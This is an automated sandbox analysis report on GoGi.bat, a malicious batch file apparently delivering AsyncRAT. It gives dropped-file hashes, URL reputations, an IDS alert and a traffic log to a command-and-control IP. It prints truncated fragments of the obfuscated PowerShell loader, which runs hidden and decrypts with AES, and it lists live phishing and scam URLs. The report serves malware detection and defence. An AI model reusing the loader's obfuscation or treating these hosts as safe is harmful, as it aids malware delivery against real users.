    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000006.00000002.1691671492.000001F263829000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmptrue
      • URL Reputation: malware
      unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://go.micropowershell.exe, 00000006.00000002.1691671492.000001F262D92000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/powershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1708498223.000001F272013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1691671492.000001F263A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1708498223.000001F271EDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://contoso.com/Licensepowershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Iconpowershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://oneget.orgXpowershell.exe, 00000006.00000002.1691671492.000001F263829000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://aka.ms/pscore68powershell.exe, 00000006.00000002.1691671492.000001F261E51000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1691671492.000001F261E51000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://oneget.orgpowershell.exe, 00000006.00000002.1691671492.000001F263829000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                193.222.96.114
                unknownGermany
                3303SWISSCOMSwisscomSwitzerlandLtdCHtrue
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1429040
                Start date and time:2024-04-20 10:17:05 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 1s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:12
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:GoGi.bat
                Detection:MAL
                Classification:mal68.evad.winBAT@11/10@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 67%
                • Number of executed functions: 7
                • Number of non-executed functions: 4
                Cookbook Comments:
                • Found application associated with file extension: .bat
                • Override analysis time to 240s for powershell
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 23.47.204.74, 23.47.204.72, 23.47.204.46, 23.47.204.58
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                • Not all processes where analyzed, report is missing behavior information
                TimeTypeDescription
                10:17:56API Interceptor16013516x Sleep call for process: powershell.exe modified
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                bg.microsoft.map.fastly.netfP4kybhBWi.exeGet hashmaliciousQuasarBrowse
                • 199.232.214.172
                ShippingOrder_ GSHS2400052.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                • 199.232.210.172
                https://bj8lt4fm8evwyl.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                • 199.232.210.172
                https://28.104-168-101-28.cprapid.com/Pay-PaI/Get hashmaliciousPayPal PhisherBrowse
                • 199.232.214.172
                https://sharma-sanjana2108.github.io/Microsoft/Get hashmaliciousUnknownBrowse
                • 199.232.210.172
                https://pusha1qsn.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                • 199.232.214.172
                https://support1-4ec.pages.dev/Get hashmaliciousTechSupportScamBrowse
                • 199.232.210.172
                https://support-bxv.pages.dev/Get hashmaliciousTechSupportScamBrowse
                • 199.232.214.172
                https://k19gdtyrshgcjghldjk.z13.web.core.windows.net/Win/index.html?phone=nullGet hashmaliciousTechSupportScamBrowse
                • 199.232.210.172
                https://19apmic17.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                • 199.232.214.172
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                SWISSCOMSwisscomSwitzerlandLtdCH15.batGet hashmaliciousUnknownBrowse
                • 193.222.96.128
                ShippingOrder_ GSHS2400052.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                • 193.222.96.147
                Encrypted_PaymentAdvice_Reference.htmlGet hashmaliciousHTMLPhisherBrowse
                • 193.222.96.119
                z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                • 193.222.96.21
                z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                • 193.222.96.21
                UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                • 193.222.96.21
                wFtZih4nN9.elfGet hashmaliciousMiraiBrowse
                • 85.7.65.219
                dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • 193.222.96.11
                http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                • 193.222.96.132
                enEQvjUlGl.elfGet hashmaliciousMiraiBrowse
                • 178.194.189.44
                No context
                No context
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                Category:dropped
                Size (bytes):69993
                Entropy (8bit):7.99584879649948
                Encrypted:true
                SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                MD5:29F65BA8E88C063813CC50A4EA544E93
                SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):3.1475546137593846
                Encrypted:false
                SSDEEP:6:kKZYlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:6lMkPlE99SNxAhUeVLVt
                MD5:690C13DB3A1B943B8692E4C6D1966A5D
                SHA1:B1275A0B1440232E8BED13A0BB51C7FBA2AF9809
                SHA-256:36B03E949625C785558661A1AB38B9F0BE88F5DEF6068255623C16E73F1D621F
                SHA-512:EAF48AD1AA817180FFE3DA248F5551251DCB53EF5D3A7E99278537AFF30E6FD1AAC8B7B7CC85CE8C072838DA59480F145BAE1D6DA605AE838704345D80E86F7F
                Malicious:false
                Reputation:low
                Preview:p...... ................(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):9713
                Entropy (8bit):4.93568648418653
                Encrypted:false
                SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smwY1D:lVib49Vkjh4iUxlYvcYKib4o
                MD5:A7EDDF0DCC37957ABAFE63CE6D0BE4CA
                SHA1:5B09680EF1C3C405D698481E1364BE0C412C7A9C
                SHA-256:B9F314DC6C4DDB176CB92C77ECB5FCA91FB58FBE12DCFD9CEB4E8BFFC07B5327
                SHA-512:A906C8FFAB88AD0CEAD9A5B4D7D4089C1621A8D36F7190EF6FD829B0D942BBBC89E76424C46E204282B6985C02ABD3488082A6A2A4D88CDE396C480E2989AF73
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):2832
                Entropy (8bit):5.414030276061799
                Encrypted:false
                SSDEEP:48:0AzsSU4YymI4RIoUeCa+m9qr9t5/78NV4GxJZKaVEouYAgwd64rHLjtvz:0AzlHYvIIfLz9qrh7KrJ5Eo9Adrxz
                MD5:BAF5A10C59FD93E444E5B672D7CCB1D4
                SHA1:906BB875AB47D641756F44E09633F75AFDDDD638
                SHA-256:B029CB8CEA8D97BF6F636D2BE3F7A0F3334A07E22B832581A3D1D1F282AFC637
                SHA-512:B52A2F66B83271814381F897CD32B83ED97F18553EEDB8DDABE99B93EAF58C46A362E6255B0744C41C5E91042238E15ED9E4CF46C11446937B850F104965087A
                Malicious:false
                Reputation:low
                Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text
                Category:dropped
                Size (bytes):8
                Entropy (8bit):2.75
                Encrypted:false
                SSDEEP:3:Rt:v
                MD5:CF759E4C5F14FE3EEC41B87ED756CEA8
                SHA1:C27C796BB3C2FAC929359563676F4BA1FFADA1F5
                SHA-256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
                SHA-512:C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
                Malicious:false
                Preview:.5.False
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (2137), with CRLF line terminators
                Category:dropped
                Size (bytes):2139
                Entropy (8bit):5.7781485718880985
                Encrypted:false
                SSDEEP:48:O2onXBS0NmhNrdR2Rd2Rxf8BmBYFSznk/kBJn3rGcTJsGcmtKWz:O5xSPh5dg+7f8BmBYFSzFx36cdHcmz
                MD5:39D538F12866D931EF35929072C94ED2
                SHA1:2A93488CA62A6F0F5F3570D6784BF7D570D598EC
                SHA-256:85536DA18EA005ADF721A739D6D07FBB2AD39AE3423ECD79F7D3CD58EB4F10E9
                SHA-512:D5FA366B516C111693E6FDAE02E1A43CCF9B01CE138E1836D04D949DA2986A7AC948B5BDACE548F298276D5264946C60FCE9136183D1A6DFF1F9E2E94FA1B58A
                Malicious:false
                Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cry
                File type:DOS batch file, ASCII text, with very long lines (51202), with CRLF line terminators
                Entropy (8bit):5.999975112908781
                TrID:
                  File name:GoGi.bat
                  File size:62'296 bytes
                  MD5:cab2108a81d68104dd9b15efcedf8351
                  SHA1:03852c18f75cad87f71693fb1973d9a04e8910ed
                  SHA256:a2dfe970dc385f9aa1a81946c4bc41144d182dbddb02e37ce4c5b52c9b884aaa
                  SHA512:e474ce03766f8e21fdb14e072144e8e1c5fa1f30e66ea4f7a05fade86bd783fb4dec65d23ab01861524959a0a029cb2112074116fdbd72d02ab4794216ed95f5
                  SSDEEP:1536:ts4yFTt4kNLNofpmw3dU7pVcJqmJQBULYJebJaRVmMWVXUpQk8daktj2aVv0+x/:tITGkDofH27pAD8YdYFpQk88kd2aJ/x/
                  TLSH:4653E0B15E3D7ADB73CA53E08E7CBE95CC40316E6AC1129B1BC43A284A9CF499E0F051
                  File Content Preview:@echo off..set "tPxaUE=setztepY sjztepYCJztepY=1ztepY &ztepY& ztepYsztepYtaztepYrt ztepY"ztepY" /ztepYmztepYinztepY ztepY"..set "JHuzvA=&& ztepYexiztepYtztepY"..set "sWWmDL=nztepYotztepY dztepYefiztepYneztepYd ztepYsjztepYCJztepY..if %sWWmDL:ztepY=% (%tPx
                  Icon Hash:9686878b929a9886
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  04/20/24-10:18:04.027368TCP2850454ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT)444949730193.222.96.114192.168.2.4
                  TimestampSource PortDest PortSource IPDest IP
                  Apr 20, 2024 10:18:03.615164995 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:03.814419031 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:03.814536095 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:03.821696043 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:04.027368069 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:04.033051014 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:04.234569073 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:04.275921106 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:05.163355112 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:05.408771992 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:05.408855915 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:05.658771038 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:19.871148109 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:20.112046957 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:20.112257957 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:20.312922001 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:20.353951931 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:20.553388119 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:20.563235044 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:20.815227032 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:20.815350056 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:21.065100908 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:34.588754892 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:34.830734968 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:34.830935955 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:35.031852961 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:35.072849989 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:35.272197008 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:35.275706053 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:35.518089056 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:35.518371105 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:35.768213034 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:49.307337999 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:49.549393892 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:49.549500942 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:49.749908924 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:49.791435957 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:49.990715027 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:49.992552996 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:50.236711025 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:18:50.236802101 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:18:50.486635923 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:04.026103973 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:04.267946959 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:04.268060923 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:04.468741894 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:04.510215998 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:04.709273100 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:04.710752010 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:04.955555916 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:04.955643892 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:05.205774069 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:11.666806936 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:11.908811092 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:11.908878088 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:12.110089064 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:12.150804996 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:12.350780964 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:12.352478981 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:12.596307039 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:12.596368074 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:12.846132994 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:22.557532072 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:22.799189091 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:22.799276114 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:23.002378941 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:23.057070971 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:23.256331921 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:23.264717102 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:23.517878056 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:23.519745111 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:23.767826080 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:36.588901997 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:36.830914021 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:36.830995083 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:37.031797886 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:37.091718912 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:37.294053078 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:37.302164078 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:37.565788031 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:37.567773104 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:37.774029970 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:37.825725079 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:38.024827957 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:38.031727076 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:38.298969030 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:38.299038887 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:38.549369097 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:41.779727936 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:42.033808947 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:42.034018993 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:42.235289097 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:42.275832891 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:42.475251913 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:42.477235079 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:42.721179962 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:42.721260071 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:42.971373081 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:42.971451044 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:43.172864914 CEST444949730193.222.96.114192.168.2.4
